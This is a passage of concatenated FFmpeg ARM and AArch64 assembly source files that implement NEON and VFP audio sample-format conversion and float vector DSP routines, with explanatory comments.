st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
8:
subs w3, w3, #2
add x0, x0, #4                          // advance dst past the 2 channels just done
b.eq end
4: // 1 channel
ldr x4, [x1]
tst w2, #8                              // odd block of 8?
mov w9, w2
mov x5, x0
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b.ne 8f
6:
subs w9, w9, #16                        // 16 samples/iteration; h-lane [1],[3].. = high s16 half
ld1 {v2.4s}, [x4], #16
fcvtzs v2.4s, v2.4s, #31
ld1 {v3.4s}, [x4], #16
fcvtzs v3.4s, v3.4s, #31
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq 7f
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
7:
st1 {v2.h}[1], [x5], x12
st1 {v2.h}[3], [x5], x12
st1 {v2.h}[5], [x5], x12
st1 {v2.h}[7], [x5], x12
st1 {v3.h}[1], [x5], x12
st1 {v3.h}[3], [x5], x12
st1 {v3.h}[5], [x5], x12
st1 {v3.h}[7], [x5], x12
b.gt 6b
ret
8:                                      // peel an odd block of 8 samples first
subs w9, w9, #8
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq end
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b 6b
end:
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 14,166
|
ffmpeg-3.0.2/libswresample/arm/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of libswresample.
*
* libswresample is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* libswresample is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with libswresample; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/arm/asm.S"
@ Convert packed float to packed s16 (ARM32 NEON).
@   r0 = int16_t *dst, r1 = const float *src, r2 = sample count
@ Floats are converted to Q31 (vcvt #31), then vqrshrn #16 narrows each
@ lane to s16 with rounding and saturation.  Handled in units of 8
@ samples; the :128 alignment hints require 16-byte aligned buffers.
function swri_oldapi_conv_flt_to_s16_neon, export=1
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!        @ prime: first 8 samples
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
beq 3f                          @ exactly 8 samples
bics r12, r2, #15               @ r12 = remainder rounded down to 16
beq 2f
1: subs r12, r12, #16           @ main loop: 16 samples/iteration
vqrshrn.s32 d4, q8, #16         @ Q31 -> s16, rounded + saturated
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vqrshrn.s32 d5, q9, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vld1.32 {q8}, [r1,:128]!        @ preload next block of 8
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {q3}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vld1.32 {q0}, [r1,:128]!     @ tail: preloaded 8 + final 8
vqrshrn.s32 d4, q8, #16
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vqrshrn.s32 d5, q9, #16
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vst1.16 {q3}, [r0,:128]!
bx lr
3: vqrshrn.s32 d4, q8, #16      @ flush final preloaded 8 samples
vqrshrn.s32 d5, q9, #16
vst1.16 {q2}, [r0,:128]!
bx lr
endfunc
@ Convert two planar float channels to interleaved s16 (ARM32 NEON).
@   r0 = int16_t *dst, r1 = float *const * (r1/r3 become the two planes),
@   r2 = samples per channel
@ vcvt #31 makes Q31 fixed point; vsri.32 #16 shifts channel-0's top 16
@ bits into channel-1's lanes, giving interleaved s16 L/R pairs.
function swri_oldapi_conv_fltp_to_s16_2ch_neon, export=1
ldm r1, {r1, r3}                @ r1 = src[0], r3 = src[1]
subs r2, r2, #8
vld1.32 {q0}, [r1,:128]!        @ prime: first 8 samples of each plane
vcvt.s32.f32 q8, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
beq 3f                          @ exactly 8 samples
bics r12, r2, #15
beq 2f
1: subs r12, r12, #16           @ main loop: 16 samples/iteration
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q10, q8, #16            @ merge ch0 into ch1 -> interleaved pairs
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vld1.32 {q13}, [r3,:128]!
vsri.32 q11, q9, #16
vst1.16 {q10}, [r0,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q11}, [r0,:128]!
vsri.32 q12, q0, #16
vld1.32 {q8}, [r1,:128]!        @ preload next block of 8
vsri.32 q13, q1, #16
vst1.16 {q12}, [r0,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {q13}, [r0,:128]!
bne 1b
ands r2, r2, #15
beq 3f
2: vsri.32 q10, q8, #16         @ tail: preloaded 8 + final 8
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vsri.32 q11, q9, #16
vld1.32 {q13}, [r3,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q10}, [r0,:128]!
vsri.32 q12, q0, #16
vst1.16 {q11}, [r0,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12-q13},[r0,:128]!
bx lr
3: vsri.32 q10, q8, #16         @ flush final preloaded 8 samples
vsri.32 q11, q9, #16
vst1.16 {q10-q11},[r0,:128]!
bx lr
endfunc
@ Convert N planar float channels to interleaved s16 (ARM32 NEON).
@   r0 = int16_t *dst, r1 = float *const *src, r2 = samples/channel,
@   r3 = channel count
@ 1- and 2-channel cases tail-call the dedicated routines.  Otherwise
@ channels go in groups of 4, then 2, then 1; r12 = 2*channels is the
@ output frame stride, so per-lane stores with stride r12 scatter each
@ group into its interleaved slots.
function swri_oldapi_conv_fltp_to_s16_nch_neon, export=1
cmp r3, #2
itt lt
ldrlt r1, [r1]                  @ 1 channel: unwrap pointer array
blt X(swri_oldapi_conv_flt_to_s16_neon)
beq X(swri_oldapi_conv_fltp_to_s16_2ch_neon)
push {r4-r8, lr}
cmp r3, #4
lsl r12, r3, #1                 @ r12 = output frame stride in bytes
blt 4f
@ 4 channels
5: ldm r1!, {r4-r7}             @ r4..r7 = next four channel planes
mov lr, r2                      @ lr = samples remaining in this group
mov r8, r0                      @ r8 = write cursor for this group's slot
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #8              @ loop: 8 frames of this 4-channel group
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q9, q8, #16             @ pack ch0/ch1 into s16 pairs
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 q11, q10, #16           @ pack ch2/ch3
vld1.32 {q2}, [r6,:128]!
vcvt.s32.f32 q2, q2, #31
vzip.32 d18, d22                @ interleave pairs -> 4-channel frames
vld1.32 {q3}, [r7,:128]!
vcvt.s32.f32 q3, q3, #31
vzip.32 d19, d23
vst1.16 {d18}, [r8], r12        @ one 4ch s16 frame per strided store
vsri.32 q1, q0, #16
vst1.16 {d22}, [r8], r12
vsri.32 q3, q2, #16
vst1.16 {d19}, [r8], r12
vzip.32 d2, d6
vst1.16 {d23}, [r8], r12
vzip.32 d3, d7
beq 7f
vld1.32 {q8}, [r4,:128]!        @ preload next 8 frames while draining
vcvt.s32.f32 q8, q8, #31
vst1.16 {d2}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {d6}, [r8], r12
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.16 {d3}, [r8], r12
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {d7}, [r8], r12
b 6b
7: vst1.16 {d2}, [r8], r12      @ flush last 4 frames of the group
vst1.16 {d6}, [r8], r12
vst1.16 {d3}, [r8], r12
vst1.16 {d7}, [r8], r12
subs r3, r3, #4
it eq
popeq {r4-r8, pc}
cmp r3, #4
add r0, r0, #8                  @ advance dst past the 4 channels just done
bge 5b
@ 2 channels
4: cmp r3, #2
blt 4f
ldm r1!, {r4-r5}
mov lr, r2
mov r8, r0
tst lr, #8                      @ odd block of 8 to peel first?
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
beq 6f
subs lr, lr, #8
beq 7f
vsri.32 d18, d16, #16           @ peel 8 frames, refilling as we store
vsri.32 d19, d17, #16
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #16             @ main loop: 16 frames/iteration
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 d18, d16, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 d19, d17, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r5,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.32 {d18[0]}, [r8], r12     @ one stereo s16 frame per 32-bit lane
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vsri.32 d2, d0, #16
vst1.32 {d19[1]}, [r8], r12
vsri.32 d3, d1, #16
vst1.32 {d22[0]}, [r8], r12
vsri.32 d6, d4, #16
vst1.32 {d22[1]}, [r8], r12
vsri.32 d7, d5, #16
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
beq 6f
vld1.32 {q8}, [r4,:128]!        @ refill while draining q1/q3
vcvt.s32.f32 q8, q8, #31
vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
bgt 6b
6: vst1.32 {d2[0]}, [r8], r12   @ flush final 8 frames
vst1.32 {d2[1]}, [r8], r12
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
b 8f
7: vsri.32 d18, d16, #16        @ exactly 8 frames total
vsri.32 d19, d17, #16
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
8: subs r3, r3, #2
add r0, r0, #4                  @ advance dst past the 2 channels just done
it eq
popeq {r4-r8, pc}
@ 1 channel
4: ldr r4, [r1]
tst r2, #8                      @ odd block of 8?
mov lr, r2
mov r5, r0
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
bne 8f
6: subs lr, lr, #16             @ 16 samples/iteration; lanes [1],[3] = high s16 halves
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r4,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
beq 7f
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
7: vst1.16 {d4[1]}, [r5,:16], r12
vst1.16 {d4[3]}, [r5,:16], r12
vst1.16 {d5[1]}, [r5,:16], r12
vst1.16 {d5[3]}, [r5,:16], r12
vst1.16 {d6[1]}, [r5,:16], r12
vst1.16 {d6[3]}, [r5,:16], r12
vst1.16 {d7[1]}, [r5,:16], r12
vst1.16 {d7[3]}, [r5,:16], r12
bgt 6b
pop {r4-r8, pc}
8: subs lr, lr, #8              @ peel an odd block of 8 samples first
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
it eq
popeq {r4-r8, pc}
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
b 6b
endfunc
|
Akagi201/ffmpeg-xcode
| 2,163
|
ffmpeg-3.0.2/libavutil/aarch64/asm.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#ifdef __ELF__
# define ELF
#else
# define ELF #
#endif
#if HAVE_AS_FUNC
# define FUNC
#else
# define FUNC #
#endif
// Declare an assembler function.  \export=1 additionally makes the symbol
// global under the EXTERN_ASM prefix (platform symbol mangling).  A nested
// `endfunc` macro is defined per-function to emit size/.endfunc and then
// purge itself, so each `function` must be closed by exactly one `endfunc`.
.macro function name, export=0, align=2
.macro endfunc
ELF .size \name, . - \name
FUNC .endfunc
.purgem endfunc
.endm
.text
.align \align
.if \export
.global EXTERN_ASM\name
ELF .type EXTERN_ASM\name, %function
FUNC .func EXTERN_ASM\name
EXTERN_ASM\name:
.else
ELF .type \name, %function
FUNC .func \name
\name:
.endif
.endm
// Declare a read-only data object.  Picks .data.rel.ro when \relocate and
// the toolchain supports it, otherwise .rodata (or .const_data on Mach-O).
// Closed by the self-purging nested `endconst` macro.
.macro const name, align=2, relocate=0
.macro endconst
ELF .size \name, . - \name
.purgem endconst
.endm
#if HAVE_SECTION_DATA_REL_RO
.if \relocate
.section .data.rel.ro
.else
.section .rodata
.endif
#elif !defined(__MACH__)
.section .rodata
#else
.const_data
#endif
.align \align
\name:
.endm
// Load the address of \val into \rd.  PIC builds use adrp + low-12 add
// (Apple uses @PAGE/@PAGEOFF relocation syntax); non-PIC falls back to a
// literal-pool ldr.
.macro movrel rd, val
#if CONFIG_PIC && defined(__APPLE__)
adrp \rd, \val@PAGE
add \rd, \rd, \val@PAGEOFF
#elif CONFIG_PIC
adrp \rd, \val
add \rd, \rd, :lo12:\val
#else
ldr \rd, =\val
#endif
.endm
// X(sym) prepends the platform's EXTERN_ASM prefix to an external symbol
// name (two-level GLUE/JOIN expands macro arguments before pasting).
#define GLUE(a, b) a ## b
#define JOIN(a, b) GLUE(a, b)
#define X(s) JOIN(EXTERN_ASM, s)
|
Akagi201/ffmpeg-xcode
| 7,934
|
ffmpeg-3.0.2/libavutil/aarch64/float_dsp_neon.S
|
/*
* ARM NEON optimised Float DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
// void ff_vector_fmul_neon(float *dst, const float *src0, const float *src1,
//                          int len)
// dst[i] = src0[i] * src1[i]; 16 floats per iteration, so len is assumed
// to be a multiple of 16 — TODO confirm with callers.
function ff_vector_fmul_neon, export=1
1: subs w3, w3, #16
ld1 {v0.4S, v1.4S}, [x1], #32
ld1 {v2.4S, v3.4S}, [x1], #32
ld1 {v4.4S, v5.4S}, [x2], #32
ld1 {v6.4S, v7.4S}, [x2], #32
fmul v16.4S, v0.4S, v4.4S
fmul v17.4S, v1.4S, v5.4S
fmul v18.4S, v2.4S, v6.4S
fmul v19.4S, v3.4S, v7.4S
st1 {v16.4S, v17.4S}, [x0], #32
st1 {v18.4S, v19.4S}, [x0], #32
b.ne 1b
ret
endfunc
// void ff_vector_fmac_scalar_neon(float *dst, const float *src, float mul,
//                                 int len)
// dst[i] += src[i] * mul (scalar in v0.S[0]); 16 floats per iteration.
// x3 = -32 rewinds x0 after the second dst load so the stores overwrite
// the same 16 elements.
function ff_vector_fmac_scalar_neon, export=1
mov x3, #-32
1: subs w2, w2, #16
ld1 {v16.4S, v17.4S}, [x0], #32
ld1 {v18.4S, v19.4S}, [x0], x3          // read dst, then step x0 back 32 bytes
ld1 {v4.4S, v5.4S}, [x1], #32
ld1 {v6.4S, v7.4S}, [x1], #32
fmla v16.4S, v4.4S, v0.S[0]
fmla v17.4S, v5.4S, v0.S[0]
fmla v18.4S, v6.4S, v0.S[0]
fmla v19.4S, v7.4S, v0.S[0]
st1 {v16.4S, v17.4S}, [x0], #32
st1 {v18.4S, v19.4S}, [x0], #32
b.ne 1b
ret
endfunc
// void ff_vector_fmul_scalar_neon(float *dst, const float *src, float mul,
//                                 int len)
// dst[i] = src[i] * mul.  Main loop handles multiples of 16; label 3
// finishes the remainder 4 floats at a time (so len is a multiple of 4 —
// TODO confirm).
function ff_vector_fmul_scalar_neon, export=1
mov w4, #15
bics w3, w2, w4                         // w3 = len rounded down to 16
dup v16.4S, v0.S[0]                     // broadcast scalar
b.eq 3f
ld1 {v0.4S, v1.4S}, [x1], #32
1: subs w3, w3, #16
fmul v0.4S, v0.4S, v16.4S
ld1 {v2.4S, v3.4S}, [x1], #32
fmul v1.4S, v1.4S, v16.4S
fmul v2.4S, v2.4S, v16.4S
st1 {v0.4S, v1.4S}, [x0], #32
fmul v3.4S, v3.4S, v16.4S
b.eq 2f
ld1 {v0.4S, v1.4S}, [x1], #32
st1 {v2.4S, v3.4S}, [x0], #32
b 1b
2: ands w2, w2, #15                     // leftover < 16?
st1 {v2.4S, v3.4S}, [x0], #32
b.eq 4f
3: ld1 {v0.4S}, [x1], #16               // remainder loop: 4 floats at a time
fmul v0.4S, v0.4S, v16.4S
st1 {v0.4S}, [x0], #16
subs w2, w2, #4
b.gt 3b
4: ret
endfunc
// void ff_vector_dmul_scalar_neon(double *dst, const double *src, double mul,
//                                 int len)
// dst[i] = src[i] * mul for doubles; 8 doubles per iteration.  Note the
// loop preloads past the final block — src must tolerate one extra 32-byte
// read (TODO confirm caller buffer padding).
function ff_vector_dmul_scalar_neon, export=1
dup v16.2D, v0.D[0]                     // broadcast scalar
ld1 {v0.2D, v1.2D}, [x1], #32
1: subs w2, w2, #8
fmul v0.2D, v0.2D, v16.2D
ld1 {v2.2D, v3.2D}, [x1], #32
fmul v1.2D, v1.2D, v16.2D
fmul v2.2D, v2.2D, v16.2D
st1 {v0.2D, v1.2D}, [x0], #32
fmul v3.2D, v3.2D, v16.2D
ld1 {v0.2D, v1.2D}, [x1], #32           // preload next block
st1 {v2.2D, v3.2D}, [x0], #32
b.gt 1b
ret
endfunc
// void ff_vector_fmul_window_neon(float *dst, const float *src0,
//                                 const float *src1, const float *win,
//                                 int len)
// Overlap-add windowing: walks src0/win forward and src1 and the window's
// mirror backward (x7 = -16 step), writing the front half of dst forward
// and the back half backward.  4 samples per iteration.
function ff_vector_fmul_window_neon, export=1
sxtw x4, w4 // len
sub x2, x2, #8
sub x5, x4, #2
add x2, x2, x5, lsl #2 // src1 + 4 * (len - 4)
add x6, x3, x5, lsl #3 // win + 8 * (len - 2)
add x5, x0, x5, lsl #3 // dst + 8 * (len - 2)
mov x7, #-16                            // backward stride for the mirrored streams
ld1 {v0.4S}, [x1], #16 // s0
ld1 {v2.4S}, [x3], #16 // wi
ld1 {v1.4S}, [x2], x7 // s1
1: ld1 {v3.4S}, [x6], x7 // wj
subs x4, x4, #4
fmul v17.4S, v0.4S, v2.4S // s0 * wi
rev64 v4.4S, v1.4S
rev64 v5.4S, v3.4S
rev64 v17.4S, v17.4S
ext v4.16B, v4.16B, v4.16B, #8 // s1_r   (rev64+ext = full 4-lane reverse)
ext v5.16B, v5.16B, v5.16B, #8 // wj_r
ext v17.16B, v17.16B, v17.16B, #8 // (s0 * wi)_rev
fmul v16.4S, v0.4S, v5.4S // s0 * wj_r
fmla v17.4S, v1.4S, v3.4S // (s0 * wi)_rev + s1 * wj
b.eq 2f
ld1 {v0.4S}, [x1], #16
fmls v16.4S, v4.4S, v2.4S // s0 * wj_r - s1_r * wi
st1 {v17.4S}, [x5], x7                  // back half written backward
ld1 {v2.4S}, [x3], #16
ld1 {v1.4S}, [x2], x7
st1 {v16.4S}, [x0], #16                 // front half written forward
b 1b
2:
fmls v16.4S, v4.4S, v2.4S // s0 * wj_r - s1_r * wi
st1 {v17.4S}, [x5], x7
st1 {v16.4S}, [x0], #16
ret
endfunc
// void ff_vector_fmul_add_neon(float *dst, const float *src0,
//                              const float *src1, const float *src2,
//                              int len)
// dst[i] = src0[i] * src1[i] + src2[i]; 8 floats per iteration.
function ff_vector_fmul_add_neon, export=1
ld1 {v0.4S, v1.4S}, [x1], #32
ld1 {v2.4S, v3.4S}, [x2], #32
ld1 {v4.4S, v5.4S}, [x3], #32
1: subs w4, w4, #8
fmla v4.4S, v0.4S, v2.4S
fmla v5.4S, v1.4S, v3.4S
b.eq 2f
ld1 {v0.4S, v1.4S}, [x1], #32           // preload next block, then store result
ld1 {v2.4S, v3.4S}, [x2], #32
st1 {v4.4S, v5.4S}, [x0], #32
ld1 {v4.4S, v5.4S}, [x3], #32
b 1b
2: st1 {v4.4S, v5.4S}, [x0], #32
ret
endfunc
// void ff_vector_fmul_reverse_neon(float *dst, const float *src0,
//                                  const float *src1, int len)
// dst[i] = src0[i] * src1[len-1-i].  src1 is walked backward (x4 = -32)
// and each 4-lane vector reversed via rev64+ext; 8 floats per iteration.
function ff_vector_fmul_reverse_neon, export=1
sxtw x3, w3
add x2, x2, x3, lsl #2                  // x2 = src1 + len (floats)
sub x2, x2, #32
mov x4, #-32
ld1 {v2.4S, v3.4S}, [x2], x4
ld1 {v0.4S, v1.4S}, [x1], #32
1: subs x3, x3, #8
rev64 v3.4S, v3.4S
rev64 v2.4S, v2.4S
ext v3.16B, v3.16B, v3.16B, #8          // full 4-lane reversal
ext v2.16B, v2.16B, v2.16B, #8
fmul v16.4S, v0.4S, v3.4S
fmul v17.4S, v1.4S, v2.4S
b.eq 2f
ld1 {v2.4S, v3.4S}, [x2], x4
ld1 {v0.4S, v1.4S}, [x1], #32
st1 {v16.4S, v17.4S}, [x0], #32
b 1b
2: st1 {v16.4S, v17.4S}, [x0], #32
ret
endfunc
// void ff_butterflies_float_neon(float *v1, float *v2, int len)
// In-place butterfly: {v1[i], v2[i]} <- {v1[i]+v2[i], v1[i]-v2[i]};
// 4 floats per iteration.
function ff_butterflies_float_neon, export=1
1: ld1 {v0.4S}, [x0]
ld1 {v1.4S}, [x1]
subs w2, w2, #4
fsub v2.4S, v0.4S, v1.4S
fadd v3.4S, v0.4S, v1.4S
st1 {v2.4S}, [x1], #16
st1 {v3.4S}, [x0], #16
b.gt 1b
ret
endfunc
// float ff_scalarproduct_float_neon(const float *v1, const float *v2,
//                                   int len)
// Returns the dot product of v1 and v2.  Accumulates 4 lanes per
// iteration, then reduces with two pairwise adds into s0.
function ff_scalarproduct_float_neon, export=1
movi v2.4S, #0
1: ld1 {v0.4S}, [x0], #16
ld1 {v1.4S}, [x1], #16
subs w2, w2, #4
fmla v2.4S, v0.4S, v1.4S
b.gt 1b
faddp v0.4S, v2.4S, v2.4S               // horizontal reduction, step 1
faddp s0, v0.2S                         // step 2: final scalar in s0
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 15,252
|
ffmpeg-3.0.2/libavutil/arm/float_dsp_vfp.S
|
/*
* Copyright (c) 2008 Siarhei Siamashka <ssvb@users.sourceforge.net>
*
* This file is part of FFmpeg
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
/**
* Assume that len is a positive number and is multiple of 8
*/
@ void ff_vector_fmul_vfp(float *dst, const float *src0, const float *src1, int len)
@ void ff_vector_fmul_vfp(float *dst, const float *src0, const float *src1, int len)
@ dst[i] = src0[i] * src1[i] using VFP vector mode: FPSCR LEN is set to 4
@ so each vmul operates on a 4-register short vector.  16 floats per
